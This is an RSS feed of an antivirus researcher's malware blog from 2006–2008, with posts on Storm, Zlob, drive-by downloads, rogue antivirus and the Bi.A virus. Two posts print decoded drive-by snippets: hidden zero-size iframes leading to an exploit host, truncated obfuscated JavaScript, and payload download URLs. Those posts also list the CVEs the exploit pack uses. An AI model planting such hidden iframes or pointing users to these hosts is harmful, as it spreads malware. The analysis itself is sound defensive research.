<?xml version="1.0" encoding="utf-8" ?>

<rss version="2.0" 
   xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
   xmlns:admin="http://webns.net/mvcb/"
   xmlns:dc="http://purl.org/dc/elements/1.1/"
   xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
   xmlns:wfw="http://wellformedweb.org/CommentAPI/"
   xmlns:content="http://purl.org/rss/1.0/modules/content/"
   >
<channel>
    <title>Nagy Ferenc László's official blog - malware</title>
    <link>http://blog.nfllab.com/</link>
    <description>(ip) (ip) (ip)</description>
    <dc:language>en</dc:language>
    <generator>Serendipity 1.3.1 - http://www.s9y.org/</generator>
    <pubDate>Tue, 08 Apr 2008 23:15:00 GMT</pubDate>

    <image>
        <url>http://blog.nfllab.com/templates/default/img/s9y_banner_small.png</url>
        <title>RSS: Nagy Ferenc László's official blog - malware - (ip) (ip) (ip)</title>
        <link>http://blog.nfllab.com/</link>
        <width>100</width>
        <height>21</height>
    </image>

<item>
    <title>Storm now called storm</title>
    <link>http://blog.nfllab.com/archives/227-Storm-now-called-storm.html</link>
            <category>malware</category>
    
    <comments>http://blog.nfllab.com/archives/227-Storm-now-called-storm.html#comments</comments>
    <wfw:comment>http://blog.nfllab.com/wfwcomment.php?cid=227</wfw:comment>

    <slash:comments>0</slash:comments>
    <wfw:commentRss>http://blog.nfllab.com/rss.php?version=2.0&amp;type=comments&amp;cid=227</wfw:commentRss>
    

    <author>nospam@example.com (Nagy Ferenc László)</author>
    <content:encoded>
    &lt;img width=&quot;515&quot; height=&quot;502&quot; src=&quot;http://blog.nfllab.com/uploads/media1/stormcodec8.png&quot; alt=&quot;StormCodec image&quot; /&gt;&lt;br /&gt;
&lt;a href=&quot;http://www.virustotal.com/analisis/2865ca0dbdedc2b81b14cf8187a7ce00&quot;&gt;20/32&lt;/a&gt; 
    </content:encoded>

    <pubDate>Wed, 09 Apr 2008 01:15:00 +0200</pubDate>
    <guid isPermaLink="false">http://blog.nfllab.com/archives/227-guid.html</guid>
    
</item>
<item>
    <title>Web developer kiterjesztés</title>
    <link>http://blog.nfllab.com/archives/225-Web-developer-kiterjesztes.html</link>
            <category>malware</category>
    
    <comments>http://blog.nfllab.com/archives/225-Web-developer-kiterjesztes.html#comments</comments>
    <wfw:comment>http://blog.nfllab.com/wfwcomment.php?cid=225</wfw:comment>

    <slash:comments>0</slash:comments>
    <wfw:commentRss>http://blog.nfllab.com/rss.php?version=2.0&amp;type=comments&amp;cid=225</wfw:commentRss>
    

    <author>nospam@example.com (Nagy Ferenc László)</author>
    <content:encoded>
    Tegyük fel, hogy kapunk egy linket egy vírusra. Tudom, hogy ez nem gyakori, de azért hébe-hóba, naponta néhányszor előfordul. Mondjuk legyen exploitos, amit javascripttel kódolnak, hogy olvashatatlan legyen. Ha megnézzük az oldal forrását, akkor ilyesmit látunk:
&lt;pre&gt;
&amp;lt;body&amp;gt;
&amp;lt;script language=&quot;JavaScript&quot;&amp;gt;
&amp;lt;!--
function Du8LaL7iG(GVYkI8cCN,eYkRMXinq){var CKUQx5Y47;va...
Du8LaL7iG(&#039;95b39bAC9E9aa2b85fBBAAa0A59A5c6B6DAD9ea992a29...
//--&amp;gt;
&amp;lt;/script&amp;gt;
&amp;lt;/body&amp;gt;
&lt;/pre&gt;
Szép. Akkor most nézzük meg a Web developer nevű firefoxos kiterjesztéstől kapott View Generated Source menüpontunkat!
&lt;pre&gt;
&amp;lt;body&amp;gt;
&amp;lt;script language=&quot;JavaScript&quot;&amp;gt;
&amp;lt;!--
function Du8LaL7iG(GVYkI8cCN,eYkRMXinq){var CKUQx5Y47;va...
Du8LaL7iG(&#039;95b39bAC9E9aa2b85fBBAAa0A59A5c6B6DAD9ea992a29...
//--&amp;gt;
&amp;lt;/script&amp;gt;&lt;span style=&quot;background: rgb(255, 208, 208); color: black&quot;&gt;&amp;lt;iframe src=&quot;http://207.10.234.217/cgi-bin/mail&lt;/span&gt;...
&amp;lt;/body&amp;gt;
&lt;/pre&gt;
Hohó, ez egyszerűbb, mint textareákkal vacakolni!&lt;br /&gt;
&lt;br /&gt;
Ui: Megtörténhet, hogy ebből a bejegyzésből nem értettél semmit. Ha így van, ne keresd sokáig magadban a hibát, inkább olvass mást! 
    </content:encoded>

    <pubDate>Thu, 03 Apr 2008 01:03:00 +0200</pubDate>
    <guid isPermaLink="false">http://blog.nfllab.com/archives/225-guid.html</guid>
    
</item>
<item>
    <title>2 Japanese 1 Finger 9 Exploits</title>
    <link>http://blog.nfllab.com/archives/217-2-Japanese-1-Finger-9-Exploits.html</link>
            <category>malware</category>
    
    <comments>http://blog.nfllab.com/archives/217-2-Japanese-1-Finger-9-Exploits.html#comments</comments>
    <wfw:comment>http://blog.nfllab.com/wfwcomment.php?cid=217</wfw:comment>

    <slash:comments>0</slash:comments>
    <wfw:commentRss>http://blog.nfllab.com/rss.php?version=2.0&amp;type=comments&amp;cid=217</wfw:commentRss>
    

    <author>nospam@example.com (Nagy Ferenc László)</author>
    <content:encoded>
    There is a website which is agressively advertised in spam. It contains an unsavory (well, matter of taste) video. But what&#039;s the business in it? You guessed it (I hope): http:// 2j1f . com/ installs malware.&lt;br /&gt;
&lt;br /&gt;
The main page contains two encoded scripts. The second one (near to the end) looks like a traffic counter. Really. Let&#039;s see the first one (after decoding):&lt;br /&gt;
&amp;lt;script&amp;gt;window.status=&quot;Done&quot;&amp;lt;/script&amp;gt;&lt;br /&gt;
&amp;lt;iframe src=&quot;header_01.gif&quot; width=0 height=0&amp;gt;&amp;lt;/iframe&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The file called header_01.gif is not an image but a script, and is also encoded. The decoded code is:&lt;br /&gt;
&amp;lt;script&amp;gt;window.status=&quot;Done&quot;&amp;lt;/script&amp;gt;&lt;br /&gt;
&amp;lt;iframe src=&quot;http:// currentsession . net /session/index.php?usermode=start&amp;amp;action=level3&quot; width=0 height=0&amp;gt;&amp;lt;/iframe&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Okay, we now have a 45 kilobyte script full of exploits. Summary:&lt;br /&gt;
&lt;a href=&quot;http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0625&quot;&gt;CVE-2008-0625&lt;/a&gt; Yahoo! Music Jukebox Yahoo! MediaGrid ActiveX control vulnerability&lt;br /&gt;
 downloads: http:// currentsession . net /session/yahoofile.php?action=download&amp;amp;mode=abc&lt;br /&gt;
&lt;a href=&quot;http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3147&quot;&gt;CVE-2007-3147&lt;/a&gt; Yahoo! Webcam image upload ActiveX control vulnerability&lt;br /&gt;
 downloads: see above&lt;br /&gt;
&lt;a href=&quot;http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2222&quot;&gt;CVE-2007-2222&lt;/a&gt; Microsoft Speech API ActiveX control vulnerability&lt;br /&gt;
 downloads: http:// currentsession . net /session/dspeechfile.php?action=download&amp;amp;mode=abc&lt;br /&gt;
&lt;a href=&quot;http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0660&quot;&gt;CVE-2008-0660&lt;/a&gt; FaceBook PhotoUploader vulnerability&lt;br /&gt;
 downloads: http:// currentsession . net /session/facebfile.php?action=download&amp;amp;mode=abc&lt;br /&gt;
MILW0RM:5102 another FaceBook PhotoUploader vulnerability&lt;br /&gt;
 downloads: see above&lt;br /&gt;
&lt;br /&gt;
At the end there is a script encoded by xor algorithm. It&#039;s a collection of exploits and is borrowed straight from MPack&#039;s megapack1.php (~ 0.94 version). Summary:&lt;br /&gt;
&lt;a href=&quot;http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3730&quot;&gt;CVE-2006-3730&lt;/a&gt; WebViewFolderIcon&lt;br /&gt;
&lt;a href=&quot;http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0003&quot;&gt;CVE-2006-0003&lt;/a&gt; MDAC&lt;br /&gt;
&lt;a href=&quot;http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0015&quot;&gt;CVE-2007-0015&lt;/a&gt; Quicktime RTSP&lt;br /&gt;
&lt;a href=&quot;http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5198&quot;&gt;CVE-2006-5198&lt;/a&gt; Winzip&lt;br /&gt;
These download http:// currentsession . net /session/file.php?action=download&amp;amp;mode=abc&lt;br /&gt;
&lt;br /&gt;
File.php, yahoofile.php, dspeechfile.php and facebfile.php currently returns the same file (md5: 712bc609da304f1d25f2fec6a5d62b94), which is &lt;a href=&quot;http://www.virustotal.com/analisis/d6b5afcd52520d3d359e119a4edf9bf9&quot;&gt;some downloader&lt;/a&gt;.
 
    </content:encoded>

    <pubDate>Fri, 29 Feb 2008 03:47:53 +0100</pubDate>
    <guid isPermaLink="false">http://blog.nfllab.com/archives/217-guid.html</guid>
    
</item>
<item>
    <title>The motivation behind 90 Day Jane</title>
    <link>http://blog.nfllab.com/archives/213-The-motivation-behind-90-Day-Jane.html</link>
            <category>malware</category>
    
    <comments>http://blog.nfllab.com/archives/213-The-motivation-behind-90-Day-Jane.html#comments</comments>
    <wfw:comment>http://blog.nfllab.com/wfwcomment.php?cid=213</wfw:comment>

    <slash:comments>0</slash:comments>
    <wfw:commentRss>http://blog.nfllab.com/rss.php?version=2.0&amp;type=comments&amp;cid=213</wfw:commentRss>
    

    <author>nospam@example.com (Nagy Ferenc László)</author>
    <content:encoded>
    In the past days many people and journalists wondered why somebody created a blog where she allegedly wanted to record the events and feelings of her last 90 days of life. (After that she wanted to commit suicide.) Is it a joke? Is it marketing? Looks like the solution is very simple. If you go to the blog now, you will see a &quot;Video ActiveX Object Error&quot; instead of the videos:
&lt;br /&gt;
&lt;a href=&quot;http://blog.nfllab.com/uploads/media1/90daytrojan.png&quot;&gt;&lt;img width=&quot;110&quot; height=&quot;83&quot; src=&quot;http://blog.nfllab.com/uploads/media1/90daytrojan.serendipityThumb.png&quot; alt=&quot;90 Day Jane Malware screenshot&quot; /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
The file that can be downloaded now (from my IP address) has 2077e236b9cbe7133f8c74876c41190e as MD5, and is &lt;a href=&quot;http://www.virustotal.com/en/analisis/d46b2a44c44440ebce96d39436cd9b9b&quot;&gt;detected by 11 of 32 scanners&lt;/a&gt; on VirusTotal. (The others need to be updated.)&lt;br /&gt;
&lt;br /&gt;
Update: Or maybe it&#039;s not the blogger&#039;s motivation. Maybe what I checked is a copy of the original blog, which copy was created by trojan distributors. As the original addresses (www.90dayjane.com and www.90dayjane.blogspot.com) are not available now, it&#039;s what will be found by the searchers. 
    </content:encoded>

    <pubDate>Thu, 14 Feb 2008 23:52:00 +0100</pubDate>
    <guid isPermaLink="false">http://blog.nfllab.com/archives/213-guid.html</guid>
    
</item>
<item>
    <title>Storm-nosztalgia</title>
    <link>http://blog.nfllab.com/archives/198-Storm-nosztalgia.html</link>
            <category>malware</category>
    
    <comments>http://blog.nfllab.com/archives/198-Storm-nosztalgia.html#comments</comments>
    <wfw:comment>http://blog.nfllab.com/wfwcomment.php?cid=198</wfw:comment>

    <slash:comments>0</slash:comments>
    <wfw:commentRss>http://blog.nfllab.com/rss.php?version=2.0&amp;type=comments&amp;cid=198</wfw:commentRss>
    

    <author>nospam@example.com (Nagy Ferenc László)</author>
    <content:encoded>
    Hiányzik a &lt;a href=&quot;http://www.superlaugh.com/1/catnip.htm&quot;&gt;röhögő macska&lt;/a&gt;, manapság csak csontvázas vírusokat kapok. 
    </content:encoded>

    <pubDate>Thu, 01 Nov 2007 00:05:00 +0100</pubDate>
    <guid isPermaLink="false">http://blog.nfllab.com/archives/198-guid.html</guid>
    
</item>
<item>
    <title>A Zlob trójai beszél magyarul</title>
    <link>http://blog.nfllab.com/archives/192-A-Zlob-trojai-beszel-magyarul.html</link>
            <category>malware</category>
    
    <comments>http://blog.nfllab.com/archives/192-A-Zlob-trojai-beszel-magyarul.html#comments</comments>
    <wfw:comment>http://blog.nfllab.com/wfwcomment.php?cid=192</wfw:comment>

    <slash:comments>0</slash:comments>
    <wfw:commentRss>http://blog.nfllab.com/rss.php?version=2.0&amp;type=comments&amp;cid=192</wfw:commentRss>
    

    <author>nospam@example.com (Nagy Ferenc László)</author>
    <content:encoded>
    Úgy ahogy.&lt;br /&gt;
&lt;br /&gt;
&lt;img width=&quot;362&quot; height=&quot;277&quot; src=&quot;http://blog.nfllab.com/uploads/media1/zlob.png&quot; alt=&quot;Zlob magyarul&quot; /&gt; 
    </content:encoded>

    <pubDate>Tue, 18 Sep 2007 01:04:01 +0200</pubDate>
    <guid isPermaLink="false">http://blog.nfllab.com/archives/192-guid.html</guid>
    
</item>
<item>
    <title>I'm a Zlob distributor</title>
    <link>http://blog.nfllab.com/archives/144-Im-a-Zlob-distributor.html</link>
            <category>malware</category>
    
    <comments>http://blog.nfllab.com/archives/144-Im-a-Zlob-distributor.html#comments</comments>
    <wfw:comment>http://blog.nfllab.com/wfwcomment.php?cid=144</wfw:comment>

    <slash:comments>4</slash:comments>
    <wfw:commentRss>http://blog.nfllab.com/rss.php?version=2.0&amp;type=comments&amp;cid=144</wfw:commentRss>
    

    <author>nospam@example.com (Nagy Ferenc László)</author>
    <content:encoded>
    This is a screenshot of my personal forum (before I deleted this post):&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;http://blog.nfllab.com/uploads/media1/angelinazlob.png&quot;&gt;&lt;img width=&quot;110&quot; height=&quot;99&quot; border=&quot;0&quot; src=&quot;http://blog.nfllab.com/uploads/media1/angelinazlob.serendipityThumb.png&quot; alt=&quot;post with links to Zlob pages&quot; /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
The link and the picture redirects to a site, which is the number 1421 affiliate of the Zlob business. The site contains links to infected videogalleries, and all the links contain this number, so the Zlob-people can pay for the traffic.&lt;br /&gt;
&lt;br /&gt;
Don&#039;t you know Zlob? Good for you. Trojan.DL.Zlob is a downloader trojan that usually disguises itself as a codec or xxx password manager. Creators nowadays register at least 10 new hosting domains per month, with names like *codec, *encoder or similar. The programs are different on the different domains, and are changed twice a day, so it&#039;s very hard for a virus scanner to remain up to date.&lt;br /&gt;
&lt;br /&gt;
The installer downloads other components from the network, that usually show „Your PC is infected”  popups (this component is also known as Trojan.Renos). Of course the popups always know what „antivirus” you should use to remove it. Recent proposals are: SpyFalcon, SpyAxe, SpywareQuake, VirusBurst or VirusBursters. The last ones are especially sticky for my employer, because the name of our company and our flagship product is VirusBuster. The difference is that we are in &lt;a href=&quot;http://www.virusbtn.com/vb100/archive/results.xml?display=summary&quot;&gt;this&lt;/a&gt; list, while VirusBurst is in &lt;a href=&quot;http://www.spywarewarrior.com/rogue_anti-spyware.htm&quot;&gt;this&lt;/a&gt; list.&lt;br /&gt;
&lt;br /&gt;
PS: Looks like VB100% results are classified. You have to create a free password or you can pick one from &lt;a href=&quot;http://www.bugmenot.com/view/www.virusbtn.com&quot;&gt;here&lt;/a&gt;.&lt;br /&gt;
PS2: &lt;a href=&quot;http://isc.sans.org/diary.php?storyid=1872&quot;&gt;An Overview of the FreeVideo Player Trojan&lt;/a&gt; by Internet Storm Center&lt;br /&gt;
Update: The animal described at the PS2 link is not Trojan.Zlob, but Trojan.DNSChanger. Same idea but different payload. Sorry. 
    </content:encoded>

    <pubDate>Wed, 22 Nov 2006 01:58:00 +0100</pubDate>
    <guid isPermaLink="false">http://blog.nfllab.com/archives/144-guid.html</guid>
    
</item>
<item>
    <title>Kerüld a 35mb.com webhelyet!</title>
    <link>http://blog.nfllab.com/archives/86-Kerueld-a-35mb.com-webhelyet!.html</link>
            <category>malware</category>
    
    <comments>http://blog.nfllab.com/archives/86-Kerueld-a-35mb.com-webhelyet!.html#comments</comments>
    <wfw:comment>http://blog.nfllab.com/wfwcomment.php?cid=86</wfw:comment>

    <slash:comments>2</slash:comments>
    <wfw:commentRss>http://blog.nfllab.com/rss.php?version=2.0&amp;type=comments&amp;cid=86</wfw:commentRss>
    

    <author>nospam@example.com (Nagy Ferenc László)</author>
    <content:encoded>
    Na, rövid leszek. Valahová nagyon eltűnt a Nosza Legyél Má&#039; Te Is Milijomos című számítógépes játék. Sikerült egy utolsó linket találnom egy blogban, mely a download.35mb.com webhelyre mutatott. Ami rögtön érdekes volt, hogy az oldal kizárólag Internet Explorerrel hajlandó működni, azzal pedig ActiveX programot akar telepíteni a gépünkre. „Nyugi, semmi vírus meg ilyesmit nem kapsz be vele.” &amp;#x2013; írta a blog tulajdonosa. Naivitás rulez. :-) A &lt;a href=&quot;http://www.kaspersky.com/scanforvirus&quot;&gt;Kaspersky antivírus&lt;/a&gt; Trojan-Downloader.Win32.VB.en néven ismeri fel az ActiveX-et, ami a www.impregnable.net oldalról letölt egy Trojan-Clicker.Win32.VB.gl néven felismert állományt, ami tovább letölt egy Trojan.Win32.StartPage.kk nevűt.&lt;br /&gt;
&lt;br /&gt;
Ha az Internet Explorer megkérdezi, hogy szeretnénk-e installálni programot, ami programok vírusokat és egyéb kártevőket tartalmazhatnak, akkor mindig azt kell válaszolni, hogy nem. Ha harmincszor kérdezi meg, akkor harmincszor kell nemet válaszolni. Ha a weblap azt írja, hogy „Figyi, tudom, hogy meg fogja kérdezni az Internet Explorer, hogy installálni akarod-e a programot, ami programok esetleg vírusokat és egyéb kártevőket tartalmazhatnak, de ez normális, azt jelenti, hogy minden jól megy, és nyugodtan nyomjál YES-t!”, akkor is NO-t nyomjál! Amúgy meg használj Firefoxot, az nem kérdez hülyeségeket. Oké, nem fogod tudni használni a 35mb.com-ot, de megéri legyőzni a kíváncsiságodat. Amúgy az NLMTIM_1_4.zip már régen nincs rajta, de ezt persze nem árulta volna el az elején, mert ki telepít akkor kémprogramokat?&lt;br /&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align:center&quot;&gt;
&lt;a href=&quot;http://firefox.hu/&quot; title=&quot;Firefox.hu - mindent megmutat!&quot;&gt;
&lt;img src=&quot;http://firefox.hu/banner_firefoxdoboz.png&quot;
  width=&quot;70&quot; height=&quot;70&quot; border=&quot;0&quot; alt=&quot;Firefox.hu&quot; /&gt;
&lt;/a&gt;&lt;/div&gt; 
    </content:encoded>

    <pubDate>Sun, 21 May 2006 21:50:00 +0200</pubDate>
    <guid isPermaLink="false">http://blog.nfllab.com/archives/86-guid.html</guid>
    
</item>
<item>
    <title>Virus hoax without chain letter</title>
    <link>http://blog.nfllab.com/archives/83-Virus-hoax-without-chain-letter.html</link>
            <category>malware</category>
    
    <comments>http://blog.nfllab.com/archives/83-Virus-hoax-without-chain-letter.html#comments</comments>
    <wfw:comment>http://blog.nfllab.com/wfwcomment.php?cid=83</wfw:comment>

    <slash:comments>0</slash:comments>
    <wfw:commentRss>http://blog.nfllab.com/rss.php?version=2.0&amp;type=comments&amp;cid=83</wfw:commentRss>
    

    <author>nospam@example.com (Nagy Ferenc László)</author>
    <content:encoded>
    Once in a while hoaxes break out of their usual chain letter habitat and reach a more official media. What is rarer, that the journalist creates a new one from misinterpreted and unvetted information, like in &lt;a href=&quot;http://www.vnunet.com/vnunet/news/2154728/bluetooth-virus-leaves-mobile&quot;&gt;this article&lt;/a&gt;. As you can read in &lt;a href=&quot;http://www.f-secure.com/weblog/archives/archive-042006.html#00000865&quot;&gt;F-Secure&#039;s weblog&lt;/a&gt;, there is no known mobile virus/worm that sends premium rate SMS. 
    </content:encoded>

    <pubDate>Thu, 27 Apr 2006 19:58:56 +0200</pubDate>
    <guid isPermaLink="false">http://blog.nfllab.com/archives/83-guid.html</guid>
    
</item>
<item>
    <title>Bi.A virus helps fix Linux kernel</title>
    <link>http://blog.nfllab.com/archives/78-Bi.A-virus-helps-fix-Linux-kernel.html</link>
            <category>malware</category>
    
    <comments>http://blog.nfllab.com/archives/78-Bi.A-virus-helps-fix-Linux-kernel.html#comments</comments>
    <wfw:comment>http://blog.nfllab.com/wfwcomment.php?cid=78</wfw:comment>

    <slash:comments>0</slash:comments>
    <wfw:commentRss>http://blog.nfllab.com/rss.php?version=2.0&amp;type=comments&amp;cid=78</wfw:commentRss>
    

    <author>nospam@example.com (Nagy Ferenc László)</author>
    <content:encoded>
    See &lt;a href=&quot;http://software.newsforge.com/article.pl?sid=06/04/18/1941251&quot; &gt;Torvalds creates patch for cross-platform virus&lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;
Bi.A (&lt;a href=&quot;http://www.virusbuster.hu/en/viruslab/descriptions/bi.a&quot;&gt;my description&lt;/a&gt;, &lt;a href=&quot;http://www.viruslist.com/en/weblog?discuss=183651915&amp;amp;return=1&quot;&gt;Kaspersky description&lt;/a&gt;) is a cross-platform Linux/Win32 virus reported by &lt;a href=&quot;http://www.kaspersky.com/&quot;&gt;Kaspersky Lab&lt;/a&gt; earlier this month. Of course, it&#039;s not the first virus in its kind, other Win32/Linux viruses are &lt;a href=&quot;http://antivirus.about.com/library/weekly/aa032801a.htm&quot;&gt;Winux&lt;/a&gt;/&lt;a href=&quot;http://www.f-secure.com/v-descs/lindose.shtml&quot;&gt;Lindose&lt;/a&gt;/&lt;a href=&quot;http://www.symantec.com/avcenter/venc/data/w32.peelf.2132.html&quot;&gt;Peelf&lt;/a&gt; and D version of &lt;a href=&quot;http://www.symantec.com/avcenter/venc/data/linux.simile.html&quot;&gt;Simile&lt;/a&gt;/&lt;a href=&quot;http://www.f-secure.com/v-descs/etap.shtml&quot;&gt;Etap&lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;
It turned out, that Bi.A does not work with newest Linux kernels (starting from 2.6.16 according to Linus). This is because the kernel destroys one of the registers&#039; value due to faulty optimisation. I don&#039;t know any official specification on x86 binary system call interface, but it&#039;s expected that the kernel do not modify registers that are not output parameters. So Linus fixed the kernel and future versions will correctly run this virus and any similar programs that use the ftruncate system call through int 0x80 instead of libc functions.&lt;br /&gt;
&lt;br /&gt;
Note that the NewsForge article assumes that Bi.A is an old virus, because it uses old system calls, but it&#039;s pretty common that virus writers use old methods as long as they work.&lt;br /&gt;
&lt;br /&gt;
Szólj, ha lefordítsam neked magyarra!
 
    </content:encoded>

    <pubDate>Wed, 19 Apr 2006 13:47:00 +0200</pubDate>
    <guid isPermaLink="false">http://blog.nfllab.com/archives/78-guid.html</guid>
    
</item>
<item>
    <title>Proxies for the underworld: I-Worm.Locksky.AS</title>
    <link>http://blog.nfllab.com/archives/52-Proxies-for-the-underworld-I-Worm.Locksky.AS.html</link>
            <category>malware</category>
    
    <comments>http://blog.nfllab.com/archives/52-Proxies-for-the-underworld-I-Worm.Locksky.AS.html#comments</comments>
    <wfw:comment>http://blog.nfllab.com/wfwcomment.php?cid=52</wfw:comment>

    <slash:comments>0</slash:comments>
    <wfw:commentRss>http://blog.nfllab.com/rss.php?version=2.0&amp;type=comments&amp;cid=52</wfw:commentRss>
    

    <author>nospam@example.com (Nagy Ferenc László)</author>
    <content:encoded>
    Wait 6 months patiently, then you can read it:
&lt;a href=&quot;http://www.virusbtn.com/virusbulletin/archive/2006/03/vb200603-locksky&quot;&gt;http://www.virusbtn.com/virusbulletin/archive/2006/03/vb200603-locksky&lt;/a&gt; 
    </content:encoded>

    <pubDate>Thu, 02 Mar 2006 21:23:20 +0100</pubDate>
    <guid isPermaLink="false">http://blog.nfllab.com/archives/52-guid.html</guid>
    
</item>
<item>
    <title>Dear Amazon.com Customer,</title>
    <link>http://blog.nfllab.com/archives/9-Dear-Amazon.com-Customer,.html</link>
            <category>malware</category>
    
    <comments>http://blog.nfllab.com/archives/9-Dear-Amazon.com-Customer,.html#comments</comments>
    <wfw:comment>http://blog.nfllab.com/wfwcomment.php?cid=9</wfw:comment>

    <slash:comments>0</slash:comments>
    <wfw:commentRss>http://blog.nfllab.com/rss.php?version=2.0&amp;type=comments&amp;cid=9</wfw:commentRss>
    

    <author>nospam@example.com (Nagy Ferenc László)</author>
    <content:encoded>
    &lt;i&gt;We&#039;ve noticed that customers who have purchased The Art of Computer Virus Research and Defense by Peter Szor also purchased books by Kevin D. Mitnick.&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;Balanced reading. &lt;img src=&quot;http://blog.nfllab.com/templates/default/img/emoticons/smile.png&quot; alt=&quot;:-)&quot; style=&quot;display: inline; vertical-align: bottom;&quot; class=&quot;emoticon&quot; /&gt; 
    </content:encoded>

    <pubDate>Sat, 24 Dec 2005 13:57:42 +0100</pubDate>
    <guid isPermaLink="false">http://blog.nfllab.com/archives/9-guid.html</guid>
    
</item>

</channel>
</rss>